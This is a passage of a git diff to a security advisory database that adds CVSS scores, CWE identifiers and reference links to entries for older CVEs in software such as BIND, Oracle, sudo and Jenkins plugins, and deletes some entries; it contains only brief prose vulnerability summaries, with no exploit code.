 "details": "dnskeygen in BIND 8.2.4 and earlier, and dnssec-keygen in BIND 9.1.2 and earlier, set insecure permissions for a HMAC-MD5 shared secret key file used for DNS Transactional Signatures (TSIG), which allows attackers to obtain the keys and perform dynamic DNS updates.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -33,7 +36,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-276"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/04/GHSA-v25x-3wqw-87r9/GHSA-v25x-3wqw-87r9.json b/advisories/unreviewed/2022/04/GHSA-v25x-3wqw-87r9/GHSA-v25x-3wqw-87r9.json
index a725017a34200..35f9c095c58a0 100644
--- a/advisories/unreviewed/2022/04/GHSA-v25x-3wqw-87r9/GHSA-v25x-3wqw-87r9.json
+++ b/advisories/unreviewed/2022/04/GHSA-v25x-3wqw-87r9/GHSA-v25x-3wqw-87r9.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-v25x-3wqw-87r9",
- "modified": "2022-04-29T02:59:26Z",
+ "modified": "2024-02-02T15:30:25Z",
 "published": "2022-04-29T02:59:26Z",
 "aliases": [
 "CVE-2004-1363"
 ],
 "details": "Buffer overflow in extproc in Oracle 10g allows remote attackers to execute arbitrary code via environment variables in the library name, which are expanded after the length check is performed.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -53,7 +56,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-119"
+ "CWE-119",
+ "CWE-131"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/04/GHSA-vcjq-7hcj-xh74/GHSA-vcjq-7hcj-xh74.json b/advisories/unreviewed/2022/04/GHSA-vcjq-7hcj-xh74/GHSA-vcjq-7hcj-xh74.json
index 30cc5ee415f5a..5ea2e9d5327ab 100644
--- a/advisories/unreviewed/2022/04/GHSA-vcjq-7hcj-xh74/GHSA-vcjq-7hcj-xh74.json
+++ b/advisories/unreviewed/2022/04/GHSA-vcjq-7hcj-xh74/GHSA-vcjq-7hcj-xh74.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-vcjq-7hcj-xh74",
- "modified": "2022-04-30T18:10:12Z",
+ "modified": "2024-02-02T03:30:26Z",
 "published": "2022-04-30T18:10:12Z",
 "aliases": [
 "CVE-1999-0239"
 ],
 "details": "Netscape FastTrack Web server lists files when a lowercase \"get\" command is used instead of an uppercase GET.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
 ],
 "affected": [
@@ -18,6 +21,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-1999-0239"
 },
+ {
+ "type": "WEB",
+ "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/1731"
+ },
 {
 "type": "WEB",
 "url": "http://www.osvdb.org/122"
@@ -25,7 +32,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-178"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/04/GHSA-vgr8-rhcx-42jv/GHSA-vgr8-rhcx-42jv.json b/advisories/unreviewed/2022/04/GHSA-vgr8-rhcx-42jv/GHSA-vgr8-rhcx-42jv.json
index c5aec1e38373e..921acfeaecbaa 100644
--- a/advisories/unreviewed/2022/04/GHSA-vgr8-rhcx-42jv/GHSA-vgr8-rhcx-42jv.json
+++ b/advisories/unreviewed/2022/04/GHSA-vgr8-rhcx-42jv/GHSA-vgr8-rhcx-42jv.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-vgr8-rhcx-42jv",
- "modified": "2022-04-30T18:10:33Z",
+ "modified": "2024-02-08T18:30:37Z",
 "published": "2022-04-30T18:10:33Z",
 "aliases": [
 "CVE-1999-0426"
 ],
 "details": "The default permissions of /dev/kmem in Linux versions before 2.0.36 allows IP spoofing.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -25,7 +28,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-276"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/04/GHSA-vv2m-p3gp-w7p3/GHSA-vv2m-p3gp-w7p3.json b/advisories/unreviewed/2022/04/GHSA-vv2m-p3gp-w7p3/GHSA-vv2m-p3gp-w7p3.json
index 13b706725e6ba..54d5b57630bc8 100644
--- a/advisories/unreviewed/2022/04/GHSA-vv2m-p3gp-w7p3/GHSA-vv2m-p3gp-w7p3.json
+++ b/advisories/unreviewed/2022/04/GHSA-vv2m-p3gp-w7p3/GHSA-vv2m-p3gp-w7p3.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-vv2m-p3gp-w7p3",
- "modified": "2022-04-30T18:19:19Z",
+ "modified": "2024-02-02T03:30:30Z",
 "published": "2022-04-30T18:19:19Z",
 "aliases": [
 "CVE-2002-0485"
 ],
 "details": "Norton Anti-Virus (NAV) allows remote attackers to bypass content filtering via attachments whose Content-Type and Content-Disposition headers are mixed upper and lower case, which is ignored by some mail clients.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
+ }
 ],
 "affected": [
@@ -29,7 +32,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-178"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/04/GHSA-vv6h-2fw3-xm26/GHSA-vv6h-2fw3-xm26.json b/advisories/unreviewed/2022/04/GHSA-vv6h-2fw3-xm26/GHSA-vv6h-2fw3-xm26.json
index eff97fac7015f..00a2eb1ab60af 100644
--- a/advisories/unreviewed/2022/04/GHSA-vv6h-2fw3-xm26/GHSA-vv6h-2fw3-xm26.json
+++ b/advisories/unreviewed/2022/04/GHSA-vv6h-2fw3-xm26/GHSA-vv6h-2fw3-xm26.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-vv6h-2fw3-xm26",
- "modified": "2022-04-30T18:18:43Z",
+ "modified": "2024-02-02T03:30:30Z",
 "published": "2022-04-30T18:18:43Z",
 "aliases": [
 "CVE-2002-0184"
 ],
 "details": "Sudo before 1.6.6 contains an off-by-one error that can result in a heap-based buffer overflow that may allow local users to gain root privileges via special characters in the -p (prompt) argument, which are not properly expanded.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -77,6 +80,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
+ "CWE-131",
 "CWE-787"
 ],
 "severity": "HIGH",
diff --git a/advisories/unreviewed/2022/04/GHSA-wjpc-gjf7-9938/GHSA-wjpc-gjf7-9938.json b/advisories/unreviewed/2022/04/GHSA-wjpc-gjf7-9938/GHSA-wjpc-gjf7-9938.json
deleted file mode 100644
index e5ab70dac22c9..0000000000000
--- a/advisories/unreviewed/2022/04/GHSA-wjpc-gjf7-9938/GHSA-wjpc-gjf7-9938.json
+++ /dev/null
@@ -1,43 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-wjpc-gjf7-9938",
- "modified": "2022-04-21T01:57:46Z",
- "published": "2022-04-21T01:57:46Z",
- "aliases": [
- "CVE-2010-3663"
- ],
- "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 contains an insecure default value of the variable fileDenyPattern which could allow remote attackers to execute arbitrary code on the backend.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3663"
- },
- {
- "type": "WEB",
- "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719"
- },
- {
- "type": "WEB",
- "url": "https://security-tracker.debian.org/tracker/CVE-2010-3663"
- },
- {
- "type": "WEB",
- "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Arbitrary_Code_Execution"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-11-04T22:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/04/GHSA-wqf3-h5g7-w9q8/GHSA-wqf3-h5g7-w9q8.json b/advisories/unreviewed/2022/04/GHSA-wqf3-h5g7-w9q8/GHSA-wqf3-h5g7-w9q8.json
index a7d8cad322c74..e26aa87605d20 100644
--- a/advisories/unreviewed/2022/04/GHSA-wqf3-h5g7-w9q8/GHSA-wqf3-h5g7-w9q8.json
+++ b/advisories/unreviewed/2022/04/GHSA-wqf3-h5g7-w9q8/GHSA-wqf3-h5g7-w9q8.json
@@ -21,6 +21,14 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-26356"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6ETPM2OVZZ6KOS2L7QO7SIW6XWT5OW3F/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UHFSRVLM2JUCPDC2KGB7ETPQYJLCGBLD/"
+ },
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6ETPM2OVZZ6KOS2L7QO7SIW6XWT5OW3F/"
@@ -29,6 +37,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UHFSRVLM2JUCPDC2KGB7ETPQYJLCGBLD/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202402-07"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2022/dsa-5117"
@@ -48,6 +60,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
+ "CWE-667",
 "CWE-772"
 ],
 "severity": "MODERATE",
diff --git a/advisories/unreviewed/2022/04/GHSA-wwpq-hgfx-qq8x/GHSA-wwpq-hgfx-qq8x.json b/advisories/unreviewed/2022/04/GHSA-wwpq-hgfx-qq8x/GHSA-wwpq-hgfx-qq8x.json
index a5571b1af321a..2ce3f208d5e81 100644
--- a/advisories/unreviewed/2022/04/GHSA-wwpq-hgfx-qq8x/GHSA-wwpq-hgfx-qq8x.json
+++ b/advisories/unreviewed/2022/04/GHSA-wwpq-hgfx-qq8x/GHSA-wwpq-hgfx-qq8x.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-wwpq-hgfx-qq8x",
- "modified": "2022-04-30T18:15:09Z",
+ "modified": "2024-02-08T21:30:28Z",
 "published": "2022-04-30T18:15:09Z",
 "aliases": [
 "CVE-2000-1218"
 ],
 "details": "The default configuration for the domain name resolver for Microsoft Windows 98, NT 4.0, 2000, and XP sets the QueryIpMatching parameter to 0, which causes Windows to accept DNS updates from hosts that it did not query, which allows remote attackers to poison the DNS cache.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -29,7 +32,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-346"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/04/GHSA-x5gq-fq65-v2wc/GHSA-x5gq-fq65-v2wc.json b/advisories/unreviewed/2022/04/GHSA-x5gq-fq65-v2wc/GHSA-x5gq-fq65-v2wc.json
index 6c30dc8d8b1f5..2f29f10a6bbe0 100644
--- a/advisories/unreviewed/2022/04/GHSA-x5gq-fq65-v2wc/GHSA-x5gq-fq65-v2wc.json
+++ b/advisories/unreviewed/2022/04/GHSA-x5gq-fq65-v2wc/GHSA-x5gq-fq65-v2wc.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-x5gq-fq65-v2wc",
- "modified": "2022-04-30T18:22:26Z",
+ "modified": "2024-02-08T21:30:30Z",
 "published": "2022-04-30T18:22:25Z",
 "aliases": [
 "CVE-2002-2069"
 ],
 "details": "PGP 6.x and 7.x does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
 ],
 "affected": [
@@ -41,7 +44,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-459"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/04/GHSA-xc2p-7wgh-ffh3/GHSA-xc2p-7wgh-ffh3.json b/advisories/unreviewed/2022/04/GHSA-xc2p-7wgh-ffh3/GHSA-xc2p-7wgh-ffh3.json
index 1ed5900880bca..877085d2f36e2 100644
--- a/advisories/unreviewed/2022/04/GHSA-xc2p-7wgh-ffh3/GHSA-xc2p-7wgh-ffh3.json
+++ b/advisories/unreviewed/2022/04/GHSA-xc2p-7wgh-ffh3/GHSA-xc2p-7wgh-ffh3.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-xc2p-7wgh-ffh3",
- "modified": "2022-04-29T02:57:00Z",
+ "modified": "2024-02-08T03:32:43Z",
 "published": "2022-04-29T02:57:00Z",
 "aliases": [
 "CVE-2004-0030"
 ],
 "details": "PHP remote file inclusion vulnerability in (1) functions.php, (2) authentication_index.php, and (3) config_gedcom.php for PHPGEDVIEW 2.61 allows remote attackers to execute arbitrary PHP code by modifying the PGV_BASE_DIRECTORY parameter to reference a URL on a remote web server that contains the code.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -45,7 +48,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-829"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/04/GHSA-xcmq-73gm-f83r/GHSA-xcmq-73gm-f83r.json b/advisories/unreviewed/2022/04/GHSA-xcmq-73gm-f83r/GHSA-xcmq-73gm-f83r.json
index 95be253e16989..d24dc93bd307c 100644
--- a/advisories/unreviewed/2022/04/GHSA-xcmq-73gm-f83r/GHSA-xcmq-73gm-f83r.json
+++ b/advisories/unreviewed/2022/04/GHSA-xcmq-73gm-f83r/GHSA-xcmq-73gm-f83r.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-xcmq-73gm-f83r",
- "modified": "2022-04-30T18:12:44Z",
+ "modified": "2024-02-02T03:30:26Z",
 "published": "2022-04-30T18:12:44Z",
 "aliases": [
 "CVE-1999-1568"
 ],
 "details": "Off-by-one error in NcFTPd FTP server before 2.4.1 allows a remote attacker to cause a denial of service (crash) via a long PORT command.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
 ],
 "affected": [
@@ -33,7 +36,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-193"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/04/GHSA-xmv4-4p35-4553/GHSA-xmv4-4p35-4553.json b/advisories/unreviewed/2022/04/GHSA-xmv4-4p35-4553/GHSA-xmv4-4p35-4553.json
index 5421d12dfb300..9a050d6d44466 100644
--- a/advisories/unreviewed/2022/04/GHSA-xmv4-4p35-4553/GHSA-xmv4-4p35-4553.json
+++ b/advisories/unreviewed/2022/04/GHSA-xmv4-4p35-4553/GHSA-xmv4-4p35-4553.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-xmv4-4p35-4553",
- "modified": "2022-04-30T18:22:07Z",
+ "modified": "2024-02-08T21:30:29Z",
 "published": "2022-04-30T18:22:07Z",
 "aliases": [
 "CVE-2002-1914"
 ],
 "details": "dump 0.4 b10 through b29 allows local users to cause a denial of service (execution prevention) by using flock() to lock the /etc/dumpdates file.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
+ }
 ],
 "affected": [
@@ -45,7 +48,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-667"
 ],
 "severity": "LOW",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/04/GHSA-xr97-cg4f-4xr7/GHSA-xr97-cg4f-4xr7.json b/advisories/unreviewed/2022/04/GHSA-xr97-cg4f-4xr7/GHSA-xr97-cg4f-4xr7.json
index cf5c8ff979ec1..2fb2a6330c162 100644
--- a/advisories/unreviewed/2022/04/GHSA-xr97-cg4f-4xr7/GHSA-xr97-cg4f-4xr7.json
+++ b/advisories/unreviewed/2022/04/GHSA-xr97-cg4f-4xr7/GHSA-xr97-cg4f-4xr7.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-xr97-cg4f-4xr7",
- "modified": "2022-04-30T18:15:52Z",
+ "modified": "2024-02-02T03:30:28Z",
 "published": "2022-04-30T18:15:52Z",
 "aliases": [
 "CVE-2001-0334"
 ],
 "details": "FTP service in IIS 5.0 and earlier allows remote attackers to cause a denial of service via a wildcard sequence that generates a long string when it is expanded.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
 ],
 "affected": [
@@ -29,7 +32,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-131"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-22cq-cq7f-8jm3/GHSA-22cq-cq7f-8jm3.json b/advisories/unreviewed/2022/05/GHSA-22cq-cq7f-8jm3/GHSA-22cq-cq7f-8jm3.json
index 34cd13be7fc5e..03eac1310a746 100644
--- a/advisories/unreviewed/2022/05/GHSA-22cq-cq7f-8jm3/GHSA-22cq-cq7f-8jm3.json
+++ b/advisories/unreviewed/2022/05/GHSA-22cq-cq7f-8jm3/GHSA-22cq-cq7f-8jm3.json
@@ -45,18 +45,38 @@
 "type": "WEB",
 "url": "https://bugs.python.org/issue41944"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b%40%3Cissues.bookkeeper.apache.org%3E"
+ },
 {
 "type": "WEB",
 "url": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4%40%3Cissues.bookkeeper.apache.org%3E"
+ },
 {
 "type": "WEB",
 "url": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E"
+ },
 {
 "type": "WEB",
 "url": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RSLQD5CCM75IZGAMBDGUZEATYU5YSGJ7/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SGIY6I4YS3WOXAK4SXKIEOC2G4VZKIR7/"
+ },
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RSLQD5CCM75IZGAMBDGUZEATYU5YSGJ7/"
@@ -65,6 +85,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SGIY6I4YS3WOXAK4SXKIEOC2G4VZKIR7/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202402-04"
+ },
 {
 "type": "WEB",
 "url": "https://security.netapp.com/advisory/ntap-20201123-0004/"
diff --git a/advisories/unreviewed/2022/05/GHSA-22x7-vwh9-5w4g/GHSA-22x7-vwh9-5w4g.json b/advisories/unreviewed/2022/05/GHSA-22x7-vwh9-5w4g/GHSA-22x7-vwh9-5w4g.json
deleted file mode 100644
index 427939f73de7b..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-22x7-vwh9-5w4g/GHSA-22x7-vwh9-5w4g.json
+++ /dev/null
@@ -1,35 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-22x7-vwh9-5w4g",
- "modified": "2022-05-24T19:15:12Z",
- "published": "2022-05-24T19:15:12Z",
- "aliases": [
- "CVE-2021-32297"
- ],
- "details": "An issue was discovered in LIEF through 0.11.4. A heap-buffer-overflow exists in the function main located in pe_reader.c. It allows an attacker to cause code Execution.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-32297"
- },
- {
- "type": "WEB",
- "url": "https://github.com/lief-project/LIEF/issues/449"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-787"
- ],
- "severity": "HIGH",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2021-09-20T16:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-23r7-hf6g-qqqg/GHSA-23r7-hf6g-qqqg.json b/advisories/unreviewed/2022/05/GHSA-23r7-hf6g-qqqg/GHSA-23r7-hf6g-qqqg.json
deleted file mode 100644
index eecb443848dc4..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-23r7-hf6g-qqqg/GHSA-23r7-hf6g-qqqg.json
+++ /dev/null
@@ -1,46 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-23r7-hf6g-qqqg",
- "modified": "2022-05-13T01:25:41Z",
- "published": "2022-05-13T01:25:41Z",
- "aliases": [
- "CVE-2019-1003090"
- ],
- "details": "A cross-site request forgery vulnerability in Jenkins SOASTA CloudTest Plugin in the CloudTestServer.DescriptorImpl#doValidate form validation method allows attackers to initiate a connection to an attacker-specified server.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003090"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1054"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/107790"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-352"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-04-04T16:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-23xr-9xxr-vg3c/GHSA-23xr-9xxr-vg3c.json b/advisories/unreviewed/2022/05/GHSA-23xr-9xxr-vg3c/GHSA-23xr-9xxr-vg3c.json
deleted file mode 100644
index 70c640d3af28c..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-23xr-9xxr-vg3c/GHSA-23xr-9xxr-vg3c.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-23xr-9xxr-vg3c",
- "modified": "2022-05-13T01:48:37Z",
- "published": "2022-05-13T01:48:37Z",
- "aliases": [
- "CVE-2018-1000420"
- ],
- "details": "An improper authorization vulnerability exists in Jenkins Mesos Plugin 0.17.1 and earlier in MesosCloud.java that allows attackers with Overall/Read access to obtain credentials IDs for credentials stored in Jenkins.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000420"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2018-09-25/#SECURITY-1013%20(1)"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/106532"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-863"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-01-09T23:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-25vf-27mm-c4fh/GHSA-25vf-27mm-c4fh.json b/advisories/unreviewed/2022/05/GHSA-25vf-27mm-c4fh/GHSA-25vf-27mm-c4fh.json
index 414ef7633637d..7fec4d6219f38 100644
--- a/advisories/unreviewed/2022/05/GHSA-25vf-27mm-c4fh/GHSA-25vf-27mm-c4fh.json
+++ b/advisories/unreviewed/2022/05/GHSA-25vf-27mm-c4fh/GHSA-25vf-27mm-c4fh.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-25vf-27mm-c4fh",
- "modified": "2022-05-01T18:21:55Z",
+ "modified": "2024-02-02T03:30:31Z",
 "published": "2022-05-01T18:21:55Z",
 "aliases": [
 "CVE-2007-4268"
 ],
 "details": "Integer signedness error in the Networking component in Apple Mac OS X 10.4 through 10.4.10 allows local users to execute arbitrary code via a crafted AppleTalk message with a negative value, which satisfies a signed comparison during mbuf allocation but is later interpreted as an unsigned value, which triggers a heap-based buffer overflow.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -57,7 +60,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-681"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-268v-2qq7-84pf/GHSA-268v-2qq7-84pf.json b/advisories/unreviewed/2022/05/GHSA-268v-2qq7-84pf/GHSA-268v-2qq7-84pf.json
deleted file mode 100644
index ddc016554f20e..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-268v-2qq7-84pf/GHSA-268v-2qq7-84pf.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-268v-2qq7-84pf",
- "modified": "2022-05-13T01:18:20Z",
- "published": "2022-05-13T01:18:20Z",
- "aliases": [
- "CVE-2017-1000243"
- ],
- "details": "Jenkins Favorite Plugin 2.1.4 and older does not perform permission checks when changing favorite status, allowing any user to set any other user's favorites",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000243"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2017-06-06/"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/101946"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-862"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2017-11-01T13:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-26hw-262c-g9gc/GHSA-26hw-262c-g9gc.json b/advisories/unreviewed/2022/05/GHSA-26hw-262c-g9gc/GHSA-26hw-262c-g9gc.json
deleted file mode 100644
index 3d0f7b205b82e..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-26hw-262c-g9gc/GHSA-26hw-262c-g9gc.json
+++ /dev/null
@@ -1,38 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-26hw-262c-g9gc",
- "modified": "2022-05-14T03:13:12Z",
- "published": "2022-05-14T03:13:12Z",
- "aliases": [
- "CVE-2018-1000190"
- ],
- "details": "A exposure of sensitive information vulnerability exists in Jenkins Black Duck Hub Plugin 4.0.0 and older in PostBuildScanDescriptor.java that allows attackers with Overall/Read access to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.",
- "severity": [
- {
